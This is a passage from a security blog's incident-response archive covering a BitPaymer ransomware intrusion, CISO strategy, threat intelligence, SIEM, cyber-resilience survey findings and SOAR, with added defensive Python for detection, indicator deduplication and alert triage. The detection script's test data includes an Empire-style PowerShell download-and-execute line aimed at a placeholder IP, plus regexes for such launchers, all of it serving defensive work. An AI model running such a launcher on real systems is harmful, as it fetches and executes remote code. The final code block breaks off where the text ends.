Category Archives: Incident Response (IR)

Attackers Compromise Admin Account to Infect Manufacturing Company With BitPaymer Ransomware

Threat actors compromised an account with administrator privileges to infect a manufacturing company with BitPaymer ransomware.

A Trend Micro investigation found that the attackers used PsExec, a Sysinternals command-line tool for executing processes on remote computers, to copy and execute a BitPaymer variant between 9:40 p.m. and 11:03 p.m. on Feb. 18, 2019. PsExec requires administrative credentials on the target host: it copies a service binary to the ADMIN$ share and starts it through the Service Control Manager. From this, the researchers concluded that the manufacturing company had already been compromised before the ransomware ran.

Between Jan. 29 and Feb. 18, Trend Micro helped detect several instances in which the threat actors attempted to infect machines with an Empire PowerShell backdoor. These attempts were carried out remotely and filelessly (Empire's launchers run as in-memory PowerShell rather than dropped executables), though Trend Micro did detect binaries associated with Dridex, a banking Trojan that ESET linked to BitPaymer's creators last year.

Not a New BitPaymer Variant

Ransom.Win32.BITPAYMER.TGACAJ, the BitPaymer variant involved in this attack, was notable in that it used the victim organization's name in its ransom note and as the extension for encrypted files. But this is not the first time security researchers have observed that behavior from the ransomware. Back in November 2018, a malware researcher reported on Twitter spotting a similar version of the threat targeting several companies.

This attack is the latest in a sustained run of BitPaymer activity. The ransomware infected several hospitals belonging to NHS Lanarkshire back in August 2017, as reported by Bleeping Computer. About a year later, officials from the Alaskan borough of Matanuska-Susitna revealed in a statement that a variant of the crypto-malware had infected the borough government's networks.

How to Defend Against a Ransomware Infection

Security professionals can help defend against ransomware by using an endpoint detection and response (EDR) tool to monitor devices for suspicious activity. In this case the intrusion relied on stolen administrator credentials and legitimate tooling rather than an unpatched flaw, so the behaviors worth alerting on include PsExec's service installation on remote hosts (the PSEXESVC service appearing in the System log) and encoded or download-and-execute PowerShell launchers of the kind Empire uses, along with administrative accounts logging on remotely to machines they do not normally touch. Teams should also use a patch management tool to keep software up to date, so that attacks cannot use known vulnerabilities to plant ransomware on workstations.
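As an added illustration of what that monitoring looks like in practice (example code written for this page, not from the Trend Micro investigation), the script below runs two checks over constructed Windows event records: a System log Event ID 7045 service install whose name or image path points at PSEXESVC, and a Security log Event ID 4688 process creation where powershell.exe is launched with -EncodedCommand and the decoded script contains download-and-execute idioms. The field names, the regexes and the sample launcher are assumptions; the launcher only mimics the shape of an Empire stager.

```python
"""Detection checks for the two behaviours described above: PsExec service
installs and encoded PowerShell launchers. Added example, not code from the
Trend Micro investigation; the event records are constructed for illustration."""
import base64
import re
from typing import Dict, List

# Assumptions about how the events present: PsExec installs a service named
# PSEXESVC with its binary copied into the Windows directory via ADMIN$, and
# PowerShell's -EncodedCommand switch carries base64 of a UTF-16LE script.
PSEXEC_SERVICE = re.compile(r"psexesvc", re.IGNORECASE)
ENCODED_SWITCH = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE
)
# Download-and-execute idioms common to fileless launchers (assumption).
LAUNCHER_IDIOMS = re.compile(
    r"(IEX|Invoke-Expression|Net\.WebClient|DownloadString|FromBase64String)",
    re.IGNORECASE,
)


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand argument; return "" if it is not valid."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def inspect_event(ev: Dict[str, str]) -> List[str]:
    """Return alert strings for one event record (empty if nothing matched)."""
    alerts: List[str] = []
    if ev.get("EventID") == "7045":  # System log: a service was installed
        if PSEXEC_SERVICE.search(ev.get("ServiceName", "")) or PSEXEC_SERVICE.search(
            ev.get("ImagePath", "")
        ):
            alerts.append(
                f"psexec_service_install host={ev.get('Computer')} "
                f"service={ev.get('ServiceName')}"
            )
        # Caveat: psexec -r renames the service, so a renamed binary dropped in
        # %SystemRoot% by a remote admin logon needs a broader rule than this.
    elif ev.get("EventID") == "4688":  # Security log: process creation
        if ev.get("NewProcessName", "").lower().endswith("powershell.exe"):
            m = ENCODED_SWITCH.search(ev.get("CommandLine", ""))
            if m:
                script = decode_encoded_command(m.group(1))
                idioms = sorted({i.lower() for i in LAUNCHER_IDIOMS.findall(script)})
                if idioms:
                    alerts.append(
                        f"encoded_powershell_launcher host={ev.get('Computer')} "
                        f"user={ev.get('SubjectUserName')} idioms={','.join(idioms)}"
                    )
    return alerts


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Run inspect_event over a batch and flatten the alerts."""
    return [a for ev in events for a in inspect_event(ev)]


# Constructed sample: an Empire-style stager shape, not a real Empire payload.
SAMPLE_LAUNCHER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_LAUNCHER.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed records, field names assumed
    {"EventID": "7045", "Computer": "FS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"EventID": "7045", "Computer": "FS01", "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": "4688", "Computer": "WS07", "SubjectUserName": "svc_admin",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENCODED}"},
    {"EventID": "4688", "Computer": "WS07", "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Two of the four constructed records fire: the PSEXESVC install on FS01 and the encoded launcher run by svc_admin on WS07. The benign Spooler install and the plain script invocation stay quiet. Note that the 4688 check only works if command-line auditing is enabled in the process creation events; without it, PowerShell script block logging is the fallback source.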

Furthermore, organizations should create or update their incident response plan and keep it effective by testing it regularly and involving all relevant stakeholders.

The post Attackers Compromise Admin Account to Infect Manufacturing Company With BitPaymer Ransomware appeared first on Security Intelligence.

In Such Transformative Times, the CISO Is Key to Delivering Digital Trust

For organizations today, staying competitive means undergoing rapid digital transformation, yet few appear to have a solid approach for handling the security and privacy implications of such a change. However, ensuring organizations adapt while also retaining a high level of digital trust is exactly where the chief information security officer (CISO) can help. CISOs are adept at reviewing the security of digital crown jewels — sensitive, business-critical data — aligning security to business goals, and ensuring that disruptive technologies such as artificial intelligence (AI), internet of things (IoT) devices and augmented reality are adopted with adequate security and privacy controls.

Conveniently, there are resources to guide CISOs on how to engage on these issues. One such resource is PwC’s “Digital Trust Insights” report, which replaces their long-running Global State of Information Security Survey (GSISS) series with a broader view of cyber risks awaiting the cognitive enterprise. The report — which is based on a survey of 3,000 executives and only about a dozen pages — provides advice for CISOs, boards and business executives to rally around key issues of digital trust as they work to build a reasonably secure digital world.

Get Security Involved Early On

It will come as no surprise to anyone in cybersecurity that the best way to avoid costly and awkward security fixes — or worse, an embarrassing and damaging breach — is to bring in the security function early on in a project. The stakes are even higher for digital transformation projects. While 91 percent of companies executing transformations bring in security and privacy as stakeholders, only 53 percent are proactively managing security and privacy risks “fully from the start.” This varies somewhat by sector, and as expected, the financial services sector is in the lead with 66 percent engaging security and privacy from the start, followed by the healthcare sector (65 percent). The consumer markets sector comes in last, at 49 percent.

Bringing in stakeholders from cybersecurity and privacy from the very beginning of transformation initiatives is key. As the report noted, “Most respondents say emerging technologies are critical for business, but fewer are very confident they have sufficient ‘digital trust’ controls in place.” The survey results bear this out: 4 out of 5 organizations report that the IoT is critical to at least some parts of their business, yet only 39 percent are “very comfortable” with the digital trust controls deployed alongside their IoT adoption.

Early involvement of the security function will also improve alignment of security efforts with the business, a concern raised in the report: few organizations regularly assess whether their security controls, frameworks and strategies are still appropriate given the digitization of the enterprise and the changing privacy landscape.

Review Security Talent and Workforce Awareness

In most organizations, the security function is already stretched thin and thus not in a position to handle the many new challenges posed by an organization undergoing rapid digital transformation. When the CISO is spending most of his or her time fighting fires or pleading for budget and support, there is little time left to review high-level security strategy, ensure appropriate privacy controls around sensitive data, and adequately communicate enterprisewide security issues to top leadership and the board. Another concern is the low number of organizations that report having a security awareness program (34 percent), and even fewer require training on privacy policies and practices (31 percent).

The way forward is to perform a workforce gap assessment specifically for the cybersecurity and privacy functions, and to commit to filling key roles in security and privacy with the required level of talent. In addition, organizations should review and update (or implement if absent) policies about their IT assets and sensitive data. Security awareness campaigns should be conducted regularly, but avoid the one-size-fits-all web-based approach. Instead, look for or create engaging security awareness materials and evaluate the effectiveness of each campaign. Attackers continuously refine their tactics; your awareness activities should evolve with them.

Improve Communications and Engagement With the Board

As years go by, we get further validation that an increasing number of CISOs are providing the board with updates about cyber risks. Findings from the PwC report echo this progression, with 80 percent of organizations stating their board was provided a risk management strategy. However, only 27 percent of organizations report being “very comfortable” that the board is getting adequate metrics on cyber risk management, and a slightly larger share, 29 percent, report being “uncomfortable” with the adequacy of the information reported.

Changing the nature of the engagement between the CISO and the C-suite will take time. But the change needs to get under way, starting with communicating how threats, regulations and third-party risks impact the organization’s cyber risks. CISOs should focus on producing metrics that track the risks to business objectives and how security activities are having a measurable impact to bring those risks down to an acceptable level. Greater emphasis should be placed on the nature and quality of interactions between the CISO and the decision-makers rather than having the CISO deliver a quarterly five-minute broadcast about the organization’s security posture.

Instead, CISOs should spend a little more time learning about their audience, what drives each line of business and their particular concerns, provide materials to prime questions ahead of time, and actively invest in their relationship with the rest of the C-suite and business directors.

Test Cyber Resilience and Improve Strategies

While awareness, engagement and being there from the start are important, the only way to know for sure that the organization is prepared to deal with a data disruption or full-blown cyberattack is to put its cyber defenses to the test. Testing the cyber resilience of the organization can take many forms, depending on the level of the staff or the executives involved. The PwC report found that fewer than half of mid-to-large organizations are “very comfortable” that they have adequately tested their cyber resilience.

Once again, the CISO can and should play a key role on this issue, but doesn't have to start from a blank slate. Several key organizations have produced reports on cyber resilience, some written specifically for the C-suite and the board, others with chief information officers (CIOs) and CISOs specifically in mind.

Among the many resilience reports available are those from IBM Security and Ponemon Institute, the World Economic Forum (WEF) and the U.S. Department of Homeland Security (DHS). The latter defines resilience in cyberspace as the “ability to adapt to changing conditions and prepare for, withstand, and rapidly recover from disruption.” Organizations should evaluate their ability to adapt to changing conditions and threats, including adapting organizational strategies; prepare for (including anticipating and planning ahead of disruptions); withstand (an area that should be tested more regularly than during the yearly pen test); and recover from an adverse event.

The CISO Is Key to Successful Digital Transformation

“Companies that show the connected world how to lead in safety, security, reliability, privacy, and data ethics will be the titans of tomorrow.” — PwC “Digital Trust Insights” report

Becoming a cognitive enterprise will require major changes, changes that can shake the foundation of trust in the organization’s customers and partners. Organizations will need to balance digital innovation with cyber resilience by ensuring early engagement of the security function in major projects and seeking whole-enterprise visibility and awareness of digital risks. The CISO is key to the organization maintaining a high level of digital trust in such transformative times.


Level Up Security Operations With Threat Intelligence Cheat Codes

Few fields have experienced growth over the last two decades like cybersecurity and video gaming. Through the years, both industries have seen the rise and fall of incumbent players and the near-constant shift in consumer preferences. While learning how to embrace their own platform shifts, both fields have had to fundamentally reinvent themselves to adapt and survive.

Arcade-Style Silos Make Way for Plug-and-Play Solutions

For many people, their first memorable experience with video games was at an arcade. Arcade operators made heavy one-off investments for each new game that came out. For example, “Mortal Kombat 2” and its sequels did not build onto or integrate with the existing “Mortal Kombat” games. In many ways, this issue has also plagued cybersecurity, with the average organization deploying 80-plus point products from over 40 vendors.

The advent of the console flipped the gaming industry on its head. Rather than having to buy a new machine for each game, there was a single interface that ran multiple games, the Super Nintendo Entertainment System (SNES) being a classic example, where additional functionality was just a cartridge away. Rather than shelling out for singular monolithic solutions, consumers preferred modular platforms that let them add games in a snap.

The consumer shift toward unified platforms is true today in security as chief information security officers (CISOs) look more for integrated solutions with the ability to add new features as their organization matures. But even as silos are broken down and security data becomes more unified, how can organizations derive actionable insights from the data to understand their adversary, reduce their investigation time and increase visibility into their environment?

What’s Video Game Design Got to Do With Threat Intelligence?

Threat intelligence connects specific threat identifiers across many cybersecurity tools and feeds that information into proactive investigation, incident response and remediation workflows. When designing a threat intelligence strategy that lets analysts detect threats quickly and security operations center (SOC) leadership make informed decisions, it's important to consider your organization's unique needs based on factors such as industry, geography and the nature of your most critical assets.

Similarly, depending on the type of game and its objectives, video game designers choose to focus on varying aspects when developing a game, but three are always constant:

1. The Characters and Players

The good-versus-evil dichotomy is often invoked when talking video game character development; it’s also reflected in the constant game of cat-and-mouse between organizations and threat actors. Whether it’s Mario versus Bowser or analyst versus cyber adversary, it is important to understand the motivation behind attackers to better anticipate their next steps.

Whether that’s kidnapping the princess or exfiltrating sensitive information, security leaders can make informed risk management, organizational and staffing decisions by understanding how the enemy operates. By knowing, for example, that a specific threat actor is targeting their industry, analysts can quickly identify whether they are at risk of an exploit or take proactive steps to patch and protect potentially affected systems.

To invoke Sun Tzu, know your enemy and know yourself: having a complete view of which attackers are targeting industry peers or geographic neighbors can give you a window into the mindset of the adversary and help your organization prepare stronger defenses by understanding the vulnerabilities before they become an attack.

2. Narrative and Gameplay

One element that separates some of the best games from the rest is a strong narrative within a collaborative, multiplayer world. Designers carefully curate decision points for the user, having them make choices that potentially alter how the game unfolds. Threat intelligence guides users in their decision-making process to help inform all levels of the SOC. Tactical threat intelligence can be integrated into the workflow to help reduce false positives, enabling the frontline analyst to quickly decide what is real and what is noise. And for tier-two and -three analysts, who proactively hunt threats and facilitate incident response, having information on a particular actor's tactics, techniques and procedures (TTPs) can help them make better day-to-day decisions on task prioritization, threat mitigation and resource allocation.

As has been the trend in recent years, single-player modes are being phased out in favor of multiplayer online games. In these games, there is a strong need for communication and collaboration, since most are team-based and the success of the individual depends on the success of the team. Even though analysts may sometimes feel that they're fighting the battle alone, cybersecurity is a team sport. Threat intelligence is collaborative by nature, with many feeds driven by a combination of individuals sharing information with others in their industry and validated information from threat researchers.

Threat intelligence can be the unifier for members of the security operations center to collaborate when dealing with investigations and incident response. When teams have identified a validated threat and need to investigate or initiate a response workflow, threat intelligence solutions can integrate with incident response and case management tools to enrich playbooks with specific information about the threat. When it’s all hands on deck, teams can quickly collaborate and add additional indicators as they build the investigation and search threat intelligence for more relevant information.

3. Repeat Playability

The best games are not only fun to play once, but over and over again for years, what gamers refer to as repeat playability. Organizations typically deploy multiple threat intelligence feeds of varying quality for broad and overlapping coverage. While having more data at your teams' fingertips is generally a good thing, increased visibility often comes at a cost. Gone are the days when security teams could get by with multiple static dumps of comma-separated values (CSVs) with indicators of compromise (IoCs). Even with only four threat intelligence sources providing 300 indicators a day each, teams are receiving more than 400,000 indicators a year (4 × 300 × 365 is 438,000), many of them duplicates across feeds.

Analysts are overwhelmed, spending hours sifting through data searching for what feels like a needle in a needle stack to find bits of actionable information. The repetitive nature and sheer volume of their workload, coupled with the cybersecurity skills gap, often leads to analyst burnout. When overlapping indicators are collapsed and potential threats are automatically prioritized based on severity, corroboration and relevance, investigation time drops and analysts can focus on only the most critical threats to their organization.
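The following is an added example of that deduplicate-then-prioritize step, written for this page rather than taken from any threat intelligence product. It merges three constructed feeds that partly overlap, normalizes indicator values so the same IoC from different feeds collapses to one entry, keeps the highest severity any feed asserts, and ranks what is left by severity, by how many feeds corroborate it and by whether it is tagged for the organization's own sector. The feed contents, the severity scale and the scoring weights are all assumptions.

```python
"""Merge overlapping indicator feeds, collapse duplicates and rank the result.
Added example for this page, not code from any product; the feeds, severity
scale and scoring weights are constructed for illustration."""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

SEVERITY_WEIGHT = {"low": 1, "medium": 2, "high": 3, "critical": 4}  # assumed scale


@dataclass
class Indicator:
    value: str
    kind: str                                  # "ip", "domain", "sha256", ...
    severity: str = "low"                      # highest severity any feed asserts
    sources: List[str] = field(default_factory=list)
    tags: Set[str] = field(default_factory=set)


def normalise(kind: str, value: str) -> str:
    """Canonical form so the same IoC from different feeds collapses to one key."""
    v = value.strip()
    if kind in ("domain", "md5", "sha1", "sha256"):
        v = v.lower()
    if kind == "domain":
        v = v.rstrip(".")                      # trailing dot from DNS-style feeds
    return v


def merge_feeds(feeds: Dict[str, List[dict]]) -> Dict[Tuple[str, str], Indicator]:
    """Fold every row of every feed into one Indicator per (kind, value)."""
    merged: Dict[Tuple[str, str], Indicator] = {}
    for source, rows in feeds.items():
        for row in rows:
            key = (row["type"], normalise(row["type"], row["value"]))
            ind = merged.setdefault(key, Indicator(value=key[1], kind=key[0]))
            if source not in ind.sources:
                ind.sources.append(source)
            if SEVERITY_WEIGHT[row["severity"]] > SEVERITY_WEIGHT[ind.severity]:
                ind.severity = row["severity"]
            ind.tags.update(row.get("tags", []))
    return merged


def score(ind: Indicator, my_sector: str) -> int:
    """Severity first, then corroboration across feeds, then sector relevance."""
    s = 10 * SEVERITY_WEIGHT[ind.severity]
    s += 5 * (len(ind.sources) - 1)
    if my_sector in ind.tags:
        s += 15
    return s


def prioritise(feeds: Dict[str, List[dict]], my_sector: str, top_n: int = 5) -> List[Indicator]:
    """Merged indicators, highest score first; ties broken by value for determinism."""
    merged = merge_feeds(feeds)
    return sorted(merged.values(), key=lambda i: (-score(i, my_sector), i.value))[:top_n]


def dedup_stats(feeds: Dict[str, List[dict]]) -> Tuple[int, int]:
    """(raw rows received, unique indicators after merging)."""
    raw = sum(len(rows) for rows in feeds.values())
    return raw, len(merge_feeds(feeds))


# Constructed feeds using documentation/test-net addresses and dummy hashes.
SAMPLE_FEEDS = {
    "vendor_feed": [
        {"type": "ip", "value": "198.51.100.23", "severity": "high", "tags": ["manufacturing", "ransomware"]},
        {"type": "domain", "value": "Update-Check.example.", "severity": "medium"},
        {"type": "sha256", "value": "A" * 64, "severity": "critical", "tags": ["dridex"]},
    ],
    "isac_share": [
        {"type": "ip", "value": " 198.51.100.23 ", "severity": "medium", "tags": ["manufacturing"]},
        {"type": "domain", "value": "update-check.example", "severity": "high"},
        {"type": "ip", "value": "203.0.113.9", "severity": "low"},
    ],
    "osint_csv": [
        {"type": "sha256", "value": "a" * 64, "severity": "high"},
        {"type": "ip", "value": "203.0.113.9", "severity": "low"},
        {"type": "ip", "value": "192.0.2.77", "severity": "low", "tags": ["scanner"]},
    ],
}

if __name__ == "__main__":
    print("raw rows -> unique indicators:", dedup_stats(SAMPLE_FEEDS))
    for ind in prioritise(SAMPLE_FEEDS, my_sector="manufacturing"):
        print(score(ind, "manufacturing"), ind.kind, ind.value, ind.severity, ind.sources)
```

Nine raw rows collapse to five indicators, and the IP that two feeds agree on and that is tagged for the organization's own sector lands at the top even though a hash carries a higher raw severity. The weights are deliberately simple; in a real pipeline they would also account for feed reputation and indicator age.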

Up, Up, Down, Down, Left, Right, Left, Right

With actionable and relevant threat intelligence, security teams have the ability to see the previously unseen and significantly accelerate the way they work. Just like the Konami Code did for “Contra,” threat intelligence can provide organizations with security operations cheat codes to gain the competitive advantage they need to combat cybercriminals.



What Is the Role of SIEM in the Fusion Center Era?

Despite what you may have heard, security information and event management (SIEM) is not dead. Rather, it’s become an integral part of the latest advancement in security operations: the fusion center.

We are seeing a paradigm shift in the space, and SIEM is no longer enough on its own to conduct the level of protective monitoring organizations need to stay abreast of rapidly evolving threats. Instead, companies are looking to more comprehensive solutions that, when integrated with state-of-the-art SIEM tools, can help organizations go beyond simply detecting and reporting security incidents.

Why SIEM Only Addresses Part of the Problem

Protective monitoring is a maturing discipline within the cybersecurity portfolio. I still remember the early days when it involved little more than storing logs, usually for years. If you were lucky, you had some analytics tools to help you stitch together what went wrong, but only after the event had already occurred. Granted, this was a useful exercise to close awareness gaps and learn lessons, but it wasn’t really monitoring — and I’m not sure who ever took the time to sift through all that data.

So the security community endeavored to come up with a way to stop the horse from bolting in the first place, and SIEM was born. Along with the security operations center (SOC), this solution enabled organizations to monitor what was going on across their systems in real or near real time. As SIEM has evolved, we have developed the ability to correlate different logs, look at network flows, consider user access patterns and use powerful artificial intelligence (AI) to spot anomalies, the needles in all those haystacks of data.

However, standing up your own SOC is an expensive undertaking. That’s why, along with the technology itself, we have also developed new consumption models — in-house, outsourced, shared and cloud-based platforms — that are all aimed at reducing the costs of trying to spot what is happening on your infrastructure.

There are two problems with the current SIEM paradigm, however. First, it can take months to set up a SIEM solution properly, and it requires constant tuning to reduce false positives and let your SOC team adjust to changing business patterns. Second, too many SOC delivery models involve little more than spotting a problem and then simply telling someone about it. Of course you want someone to wake you at 4 a.m. if you're under attack, but the alert by itself doesn't solve the underlying problem. How can organizations update the way they use SIEM and security analytics tools to match the speed and complexity of today's threat landscape?

Introducing the SOC’s Big Brother: The Fusion Center

If we look at the five functions of the National Institute of Standards and Technology (NIST) Cybersecurity Framework — Identify, Protect, Detect, Respond and Recover — so far, we are only covering the detection part of the equation. To fill in the gaps, we’re now witnessing the emergence of the SOC’s big brother: the fusion center. The fusion center’s job is to cover the entire spectrum of the NIST model.

What makes the fusion center different? Whereas a SOC only pulls in data from your infrastructure and then stops at an analyst, the fusion center uses a wider set of data sources, collects data from both inside and outside your organization, correlates and enriches that data (often using advanced AI and machine learning to draw conclusions), and pushes this enriched information out to the relevant parts of your organization to respond and recover.

There are multiple advantages to the fusion center approach. Due to advanced automation and the use of machine learning, between 30 and 70 percent of level 1 analyst tasks can be automated, which helps improve response times, reduce the number of analysts needed and free up your security teams to focus on more important tasks.

Another advantage is that, due to the multiple sources of information being ingested by the system (including from native cloud monitoring tools), you can conduct more thorough and in-depth analyses of what is happening on your infrastructure and cloud systems, draw better conclusions and identify wider implications from initially simple-looking issues.

Finally, you can mount a more consistent and thorough response by using integrated runbooks and regularly drilling incident response plans. You can also implement systems that automatically notify relevant parties of key developments and collect and analyze threat data in a single portal. This results in faster containment and eradication with a complete record of what has occurred so you can review lessons learned and continuously improve your processes.

So is SIEM dead? Not remotely — but it’s no longer the only tool in your arsenal, either. With fusion center capabilities, you can harness the power of AI and machine learning to deliver better protection and speed up recovery times.


Cyber Resilience Study: Incident Response Plans and Security Automation Set High Performers Apart

Today, the Ponemon Institute released its fourth annual “The Cyber Resilient Organization” report. This global study was the first of its kind back in 2015 and has been proudly sponsored by IBM Security since the beginning.

Over time, the importance of cyber resilience within the organization has grown significantly. Security leaders are striving to benchmark the organization’s preparedness and level of security, and measuring cyber resilience is a good reflection of their ability to withstand cyberattacks.

This year’s study queried 3,655 IT and security professionals and covered 11 different global markets: the U.S., Canada, India, Germany, Japan, Brazil, the U.K., France, Australia, the Middle East and Southeast Asia.

Benchmarking Cyber Resilience to Identify Best Practices

When we look back on last year’s study, the biggest barrier to cyber resilience was a lack of investment in important tools, such as artificial intelligence (AI) and machine learning. We saw a significant change here with 23 percent of respondents now using security automation, which includes both AI and machine learning, extensively.

As part of this research, we created a benchmark for measuring cyber resilience by isolating the most cyber resilient organizations and uncovering their approaches and habits; we refer to these organizations as high performers. In this year’s study, 960 respondents — 26 percent of the total sample — identified as high performers. Let’s look at some of the key things these organizations are doing differently to achieve this enhanced level of cyber resilience.

First, high performers have response plans. Fifty-five percent of high-performing organizations have a cybersecurity incident response plan (CSIRP) deployed across the organization, as opposed to only 23 percent of the rest of the pool. Meanwhile, 77 percent of businesses do not have a consistently deployed plan. While this figure hasn't changed significantly in the four years since we started this research, it remains a surprisingly large share of organizations lacking this fundamental building block of cyber resilience.

This year, for the first time, we followed up with these respondents to understand what obstacles they faced. Some said they lacked the necessary staffing or strong leadership required to drive this process, while others pointed to difficulties with organizational structure that didn’t support a centralized approach.

It is no surprise, then, that nearly half (46 percent) of respondents said their organization has yet to reach full General Data Protection Regulation (GDPR) compliance nearly a year after the data privacy regulation took effect in May 2018. In future research, we plan to explore the reasons why companies lack a consistent incident response plan.

What Sets High-Performing Organizations Apart?

It’s clear that being a high performer has a positive impact on an organization’s security posture. High performers suffer fewer data breaches (41 percent versus 55 percent) and less disruption caused by cyberattacks. When we look further at the characteristics of high-performing organizations, it comes down to a blend of people, processes and technology.

In terms of people, the skills gap remains a critical barrier for most organizations, with respondents highlighting headcount gaps and the difficulty in hiring and retaining skilled staff as key hurdles. High-performing organizations are better able to address this and, more importantly, have leadership that values these skills and the importance of cyber resilience.

When it comes to processes, more than 55 percent of high-performing organizations have a consistently applied CSIRP, and they are more likely to participate in threat intelligence and data breach sharing partnerships (69 percent versus the average of 56 percent).

Finally, high performers identified IT complexity as a challenge. As a result, these organizations are more likely to have fewer security solutions deployed (39 versus 45 on average) and to believe they have the right technology footprint to achieve cyber resilience.

Reduce the Cost of a Data Breach With Security Automation

There is a clear need for organizations to establish a strategy to address these challenges and think about how they handle security incidents in the context of the GDPR and other regulations.

The volume and severity of cyberattacks continue to rise, but research has shown that adopting security automation can reduce the total cost of a data breach by up to $1.55 million compared with organizations that do not use it.



SOAR: The Second Arm of Security Operations

While security information and event management (SIEM) is rightly considered an indispensable tool for detecting and managing threats, it can only do so much good if detection is where the work stops. Successful threat management demands rapid incident response, yet security operations teams tend to overemphasize detection at the expense of response.

How can organizations both empower their responders to remediate threats quickly and strengthen their security posture to prevent data breaches in the first place? The answer is security orchestration, automation and response (SOAR).

SOAR Solutions Add Context to SIEM Data

SIEM solutions are now deployed in virtually every large enterprise, and for very good reason. In the U.K., in fact, the RM3808 network services procurement framework precludes any organization from bidding for public sector network services work unless it has a SIEM solution in place. This makes sense: companies should be monitoring their events and data flows if they expect to detect threats to their information or that of their customers.

SOAR tooling enables security operations teams to automate the tedious and repetitive elements of their workflow that don’t require human oversight and instead focus on more mentally challenging tasks that call for discernment and judgment. The best SOAR solutions enrich and contextualize threats to help analysts quickly triage cases according to the severity of the risk, sensitivity and/or criticality of the business functions under threat.

Many of the remedial tasks that fall under the analyst’s supervision, such as isolating endpoints, can be orchestrated with a SOAR platform via application programming interfaces (APIs). Faster remediation leads to earlier resolution of incidents in the attack chain, which greatly reduces the risk of a data breach.

A Force Multiplier for Understaffed Security Operations Teams

Even if you had an unlimited security budget at your disposal, you would still struggle to hire the caliber and quantity of talent you need to stay on top of the constant barrage of threats to your organization. According to Cybersecurity Ventures, the cyber skills shortfall is expected to hit 3.5 million unfilled positions by 2021. This is one of the reasons why white hats are lagging behind the increasingly sophisticated threat landscape in the cyber arms race.

SOAR solutions can help organizations address the talent gap by lightening analysts’ manual workload and sharpening their ability to prioritize the most pressing threats and remediate them quickly.

Enrichment and Contextualization: Where SIEM Ends and SOAR Begins

There is a degree of overlap in how vendors describe the enrichment and contextualization functionalities of their SIEM and SOAR solutions. It’s common for both products to claim that they enrich, contextualize and help triage threats. But where does SIEM end and SOAR begin?

SIEM is all about detection. The amount of automation and orchestration required for swift incident response cannot be carried out at the detection layer. If a SIEM tool processes between 10,000 and 500,000 events per second — as it does in most cases — the computing resources required are simply not available to enrich this volume of data. So why can’t the enrichment take place once the SIEM tool has generated an offense or incident?

For the average enterprise, at most about 80 percent of incidents originate from the SIEM. The rest, generated by data loss prevention (DLP) tools, managed service alerts, phishing reports and ongoing investigations, need to be channeled into the same place so that your security operations center (SOC) analysts or computer security incident response team (CSIRT) can contextualize and act upon them. SIEM tools are not optimized to support this alongside the mammoth task of analyzing enormous volumes of events and data flows against predefined correlations and indicators of compromise (IoCs). Endpoint detection and response (EDR) and threat intelligence platforms are typically not integrated with the SIEM either, so the SIEM assists with only part of the investigation process.

Lastly, case management is arguably the most crucial feature set within incident response. Cybersecurity playbooks have become enormously complex, and the level of effort and cost needed to build them into the detection layer is often prohibitive.

Why Detection Alone Is Not Enough

It goes without saying that well-calibrated detection tools give the incident response function the data it needs to remediate threats. But having well-defined incident response plans can also help sharpen and refine the rules and use cases you use to calibrate your SIEM solution. The benefits are bidirectional: What correlations and indicators are you looking for? Why are you looking for them? Once you find them, what is the incident response plan?

One of our clients recently enacted a protocol whereby detection use cases are only written if they have an associated incident response plan. If you want to write SIEM rules for the sole purpose of visibility and metrics, that’s all well and good. However, being deliberate and honest about this will keep your operations more streamlined.
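The intake-and-triage flow the preceding paragraphs describe (alerts from the SIEM, DLP, phishing reports and other sources funneled into one case format, enriched with asset criticality and threat intelligence, prioritized, and handed to a playbook) is shown below as an added example. It is not code from the original post or from any SOAR product; the asset inventory, indicator set, rule IDs, playbook names, hostnames and the scoring formula are all constructed for the illustration. It also enforces the rule from the client protocol above: a detection rule with no associated playbook never becomes an analyst case.

```python
"""Added example: minimal SOAR-style intake, enrichment and triage (constructed data)."""
from dataclasses import dataclass, field

# Constructed asset inventory: business criticality from 1 (low) to 5 (crown jewel)
ASSET_CRITICALITY = {"fin-db-01": 5, "hr-share-02": 4, "eng-ws-117": 2, "guest-wifi-nat": 1}

# Constructed threat-intel indicators (two IPs, one file hash)
TI_IOCS = {"198.51.100.23", "203.0.113.9", "e3b0c44298fc1c149afbf4c8996fb924"}

# Constructed registry enforcing "no detection use case without an IR playbook";
# SIEM-9001 is a visibility/metrics-only rule and deliberately has none.
RULE_PLAYBOOKS = {"SIEM-1042": "PB-LATERAL-MOVEMENT", "DLP-0007": "PB-DATA-EXFIL",
                  "PHISH-REPORT": "PB-PHISHING", "SIEM-9001": None}

SEVERITY = {"low": 1, "medium": 2, "high": 3, "critical": 4}


@dataclass
class Case:
    source: str
    rule_id: str
    host: str
    severity: str
    indicators: list
    playbook: str = ""
    asset_criticality: int = 1
    ti_hits: list = field(default_factory=list)
    priority: int = 0


def normalize(raw: dict) -> Case:
    """Map each source's native schema (assumed shapes) onto one common case record."""
    src = raw["source"]
    if src == "siem":
        return Case("siem", raw["rule"], raw["src_host"], raw["magnitude"], list(raw.get("iocs", [])))
    if src == "dlp":
        return Case("dlp", raw["policy"], raw["endpoint"], raw["sev"], [raw["dest_ip"]])
    if src == "phishing":
        return Case("phishing", "PHISH-REPORT", raw["reporter_host"], "medium", list(raw.get("hashes", [])))
    raise ValueError(f"unknown alert source {src!r}")


def enrich(case: Case) -> Case:
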